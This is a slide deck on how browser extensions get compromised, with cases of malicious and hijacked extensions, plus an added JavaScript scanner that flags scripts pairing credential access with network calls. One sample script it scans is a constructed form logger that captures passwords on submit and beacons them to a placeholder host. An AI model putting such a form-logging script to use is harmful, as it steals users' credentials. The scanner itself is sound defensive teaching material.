
Browser Extension Compromise

Caroline Sheng


Outline

• Introduction
• Privileges and Permissions
• Malware extensions
• Security Threats
• Human Factors
• Problems
• Where do we go from here?
• What can you do?


Introduction

• What are browser extensions?
  - A piece of software that runs inside the browser
• What do they do?
  - Extend the functionality of web browsers
• Who can create them?
  - Basically anyone
  - Many popular extensions are written by third-party developers


Extension Statistics

• Popular examples:
  - AdBlock – 40 million users on Chrome
  - TamperMonkey – 10,000,000+ users
  - Google Mail Checker – 5,000,000+ users on Chrome
• In 2011, 85% of Firefox users had at least one extension installed [12]

Source: Chrome Web Store


Privileges and Permissions

• Privileges: how much access the extension has to your browser
• Extensions often require high privileges, which can put users at risk


Privileges and Permissions (cont.)

• Until 2017 (legacy add-ons, before the move to WebExtensions [3]), all Firefox extensions ran with complete browser privileges
  - Allowed file system and network access
• This did not follow the principle of least privilege: restrict access to only the resources required to perform the task


Permission Systems

• Now Firefox, Chrome, and other major browsers have similar permission systems:
  - Developers must declare which privileges their extension requires
  - Users are shown which permissions an extension requires before installing it


Permission Warning

• Tampermonkey: provides an environment for users to write small scripts that modify browser behaviour


More privileges required

• Web Developer: adds a toolbar to the browser with web development tools


“Read and change all your data on the websites you visit”

• Sounds like a dangerously high privilege
• Actually is a required permission for many legitimate extensions: anything that runs a content script on every page (an ad blocker, a userscript manager) has to ask for it


• Some extensions have even broader permissions


What’s wrong with this?

• The nature of many browser extensions (both legitimate and not) requires them to have almost completely unrestrained access
• Once installed, extension code is fully trusted by the browser, even though it is essentially third-party code
• This offers an easy attack vector for those with malicious intent


So what?

• Some browser extensions have been downloaded by millions of users
• If a browser extension is compromised, all of its users may be affected: the malicious version reaches them through the same auto-update channel as any other release


A brief look at malware extensions

What malicious extensions are capable of


Malware Extensions

• More common than we think:
  - An analysis by security researchers of 48,000 Chrome extensions in 2014 found [9]:
    - 130 outright malicious extensions
    - 4,712 suspicious extensions
• The malicious extensions engaged in a variety of abuse:
  - Affiliate fraud
  - Credential theft
  - Advertising fraud
  - Social network abuse


Malware Extensions (cont.)

• Examples of malware extensions:
  - FormSpy (2006)
    - Trojan that installed itself as a legitimate-looking Firefox extension
    - Intercepted passwords and credit card numbers entered into the browser
  - Interface Online (2017) [7]
    - Bank fraud scam
    - Logged usernames and passwords entered into forms
    - Was available for two weeks before being taken down by Google


Security Threats

How are browser extensions compromised?


Security Threats

• Benign extensions hacked
  - Code vulnerabilities
  - Social engineering
• Extensions bought, sold, and changed
  - Popular extension developers are offered significant sums to sell their extension to suspicious parties


Code Vulnerabilities

• At DEFCON 17 (2009), Liverani and Freeman demonstrated attacks against a number of popular Firefox extensions [10]
• Many of the vulnerabilities found fell into OWASP Top 10 categories
• Ex: “if a user dragged an image from a malicious web page into the extension, the web site operator could install a remote desktop server on the user’s machine and take control of the user’s mouse and keyboard” [2]


Social Engineering

• Example: in August 2017 the Web Developer extension was updated to push adware to its users because its creator (Chris Pederick) fell for a phishing attack that captured his developer account credentials [6]


• One of the ads displayed by a fraudulently updated version of the Web Developer extension for Chrome

Source: [6] Ars Technica


Extension Ownership: Particle

• In July 2017, the Chrome extension Particle (a YouTube customisation extension) was sold by its original developer to another party, who promptly turned it into adware [4][13]


An extension update

• Chrome’s permission system meant users were informed that the new update to Particle required permissions it had never needed before:
  - “Read and change data on (all) websites visited”
  - “Manage apps, extensions, and themes”
• However, many users still accepted the new update and were then bombarded by ads


• The new owner added code to inject ads into pages on sites such as Google, Bing, Amazon and eBay

Source: [4] BleepingComputer


Lack of Transparency

• A trusted extension introduced adware in a subsequent update
• Users were not notified of the change in ownership
• Users believed the extension was safe and accepted the update, granting Particle the privileges it required to insert ads


Human Factors: Developers

• Extensions can be very simple to create; many treat it as a hobby
• Most extension developers are not security experts
  - Unaware of the danger of vulnerable extensions


Human Factors: Reviewers

• Guidelines for accepting or rejecting extensions focus more on malicious extensions than on vulnerable ones
• Vulnerable extensions very easily slip through the net


Human Factors: Users

• Users believe extensions are inherently safe
• Often install extensions without checking
• Unaware that extensions are often created by third-party developers


Problems (Summary)

• There is no standard secure framework for creating extensions
• Extensions are not evaluated for vulnerabilities before being released to the public
• Users have no way of defending themselves if a trusted extension they have installed is hacked


Where do we go from here?

• In security research:
  - HULK: a dynamic analysis system presented at the USENIX Security Symposium 2014 [9]
    - Detects malicious behaviour in browser extensions by monitoring their execution and corresponding network activity
  - VEX: “a framework for highlighting potential security vulnerabilities in browser extensions by applying static information-flow analysis to extension JavaScript code” [1]
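Neither HULK nor VEX is reproduced here, but the kind of signal a vetting tool looks for can be shown in a few dozen lines. The following added example (mine, not from either paper or from this deck) is a heuristic static scan over extension JavaScript: it flags a script as suspicious when it both touches a credential source (password fields, form submit hooks, form data, cookies) and reaches a network sink (fetch, XMLHttpRequest, sendBeacon, image beacons, WebSockets), which is the pattern behind the form-logging extensions described earlier. The three scripts it scans are constructed for this example; the `.invalid` hostnames are reserved and never resolve.

```javascript
'use strict';

// Credential "sources": ways a content script can get at secrets on the page.
const SOURCES = [
  { id: 'password-field', re: /type\s*=\s*["']password["']|\[type=["']?password["']?\]|\.password\b/ },
  { id: 'form-submit-hook', re: /addEventListener\(\s*["'](submit|keydown|keypress|input)["']/ },
  { id: 'form-data', re: /\bnew\s+FormData\s*\(|\.elements\b|\bdocument\.forms\b/ },
  { id: 'cookies', re: /\bdocument\.cookie\b|\bchrome\.cookies\b/ },
];

// Network "sinks": ways data can leave the page.
const SINKS = [
  { id: 'fetch', re: /\bfetch\s*\(/ },
  { id: 'xhr', re: /\bXMLHttpRequest\b/ },
  { id: 'beacon', re: /\bnavigator\.sendBeacon\s*\(/ },
  { id: 'image-beacon', re: /\bnew\s+Image\s*\(|\.src\s*=\s*["']https?:/ },
  { id: 'websocket', re: /\bnew\s+WebSocket\s*\(/ },
];

// Literal URLs, so a reviewer can see where data would be sent.
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

// Drop block and line comments so commented-out code does not trigger a match.
// The guard before "//" keeps "http://" and "https://" inside strings intact.
function stripComments(src) {
  return src
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/(^|[^:'"])\/\/.*$/gm, '$1');
}

// Scan one script. Verdicts: 'suspicious' (a source AND a sink in the same file),
// 'review' (only one of the two), 'benign' (neither).
function scanScript(name, src) {
  const code = stripComments(src);
  const sources = SOURCES.filter((s) => s.re.test(code)).map((s) => s.id);
  const sinks = SINKS.filter((s) => s.re.test(code)).map((s) => s.id);
  const urls = [...new Set(code.match(URL_RE) || [])];
  const verdict = sources.length && sinks.length ? 'suspicious'
    : sources.length || sinks.length ? 'review' : 'benign';
  return { name, verdict, sources, sinks, urls };
}

// Scan a whole extension given as { filename: source }.
function scanExtension(files) {
  return Object.entries(files).map(([name, src]) => scanScript(name, src));
}

// Constructed sample scripts (not taken from any real extension).
const SAMPLES = {
  'reader.js': `
  // Hide sidebars on article pages (constructed benign content script)
  document.querySelectorAll('aside').forEach((el) => { el.style.display = 'none'; });
  chrome.runtime.sendMessage({ hidden: true });
`,
  'define.js': `
  // Look up the selected word (constructed; .invalid never resolves)
  const word = window.getSelection().toString();
  fetch('https://api.example.invalid/define?q=' + encodeURIComponent(word))
    .then((r) => r.json());
`,
  'content.js': `
  document.addEventListener('submit', (e) => {
    const form = e.target;
    const user = form.querySelector('input[type="email"], input[name*="user"]');
    const pass = form.querySelector('input[type="password"]');
    if (!pass) return;
    navigator.sendBeacon('https://stats.example.invalid/c',
      JSON.stringify({ u: user && user.value, p: pass.value, h: location.host }));
  });
`,
};

// One line per file, for a quick triage listing.
function report(files) {
  return scanExtension(files)
    .map((r) => `${r.verdict.padEnd(10)} ${r.name}  sources=[${r.sources}] sinks=[${r.sinks}] urls=[${r.urls}]`)
    .join('\n');
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(report(SAMPLES));
}
```

A co-occurrence check like this has obvious false negatives (obfuscation, a source in one file and the sink in another, data relayed through the background page) and false positives (a password manager legitimately reads password fields and talks to its server), which is exactly why VEX tracks information flow and HULK watches what the extension actually does at runtime. It is still a useful first pass when triaging a store listing or an update whose diff is too large to read by hand.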


What can you do?

• Developers:
  - Follow the OWASP Top 10 guide
  - Be wary of giving others access to or control of your extension, including the developer account that publishes it
• Users:
  - Carefully evaluate extensions before deciding to install or update them
  - Don’t install unnecessary extensions


References

[1] Sruthi Bandhakavi, Samuel T. King, P. Madhusudan, Marianne Winslett. VEX: Vetting Browser Extensions for Security Vulnerabilities. Communications of the ACM, vol. 54, no. 9, 2011.

[2] Adam Barth, Adrienne Porter Felt, Prateek Saxena, Aaron Boodman. Protecting Browsers from Extension Vulnerabilities. In Proceedings of the 17th Network and Distributed System Security Symposium (NDSS 2010).

[3] Martin Brinkmann. Firefox’s new WebExtensions permission system. gHacks Technology News, March 2017. URL: https://www.ghacks.net/2017/03/06/firefoxs-new-webextensions-permission-system/

[4] Catalin Cimpanu. BleepingComputer. URL: https://www.bleepingcomputer.com/news/security/-particle-chrome-extension-sold-to-new-dev-who-immediately-turns-it-into-adware/

[5] Chromium Blog, December 2013. URL: https://blog.chromium.org/2013/12/keeping-chrome-extensions-simple.html

[6] Dan Goodin. After phishing attacks, Chrome extensions push adware to millions. Ars Technica, August 2017. URL: https://arstechnica.com/information-technology/2017/08/after-phishing-attacks-chrome-extensions-push-adware-to-millions/

[7] Dan Goodin. Bank-fraud malware not detected by any AV hosted in Chrome web store. Twice. Ars Technica, August 2017. URL: https://arstechnica.com/information-technology/2017/08/bank-fraud-malware-not-detected-by-any-av-hosted-in-chrome-web-store-twice/

[8] C. Grier, S. T. King, and D. S. Wallach. How I Learned to Stop Worrying and Love Plugins. In Web 2.0 Security and Privacy, 2009.

[9] Alexandros Kapravelos, Chris Grier, Neha Chachra, Chris Kruegel, Giovanni Vigna, and Vern Paxson. Hulk: Eliciting Malicious Behavior in Browser Extensions. In Proceedings of the USENIX Security Symposium, 2014.

[10] R. S. Liverani and N. Freeman. Abusing Firefox Extensions. DEFCON 17, July 2009.

[11] Lee Mathews. Over A Million Coders Targeted By Chrome Extension Hack. Forbes, August 2017. URL: https://www.forbes.com/sites/leemathews/2017/08/03/over-a-million-coders-targeted-by-chrome-extension-hack/#5d5d3c289c9d

[12] Mozilla Add-ons Blog, June 2011. URL: https://blog.mozilla.org/addons/2011/06/21/firefox-4-add-on-users/

[13] ParticleCore. Particle. GitHub repository, issue 528. URL: https://github.com/ParticleCore/Particle/issues/528

[14] Adrienne Porter Felt. Least Privilege for Browser Extensions. Master’s thesis, University of California, Berkeley.